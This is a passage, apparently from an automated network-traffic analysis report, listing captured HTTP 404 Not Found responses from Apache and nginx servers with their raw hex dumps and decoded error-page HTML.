Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:19 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
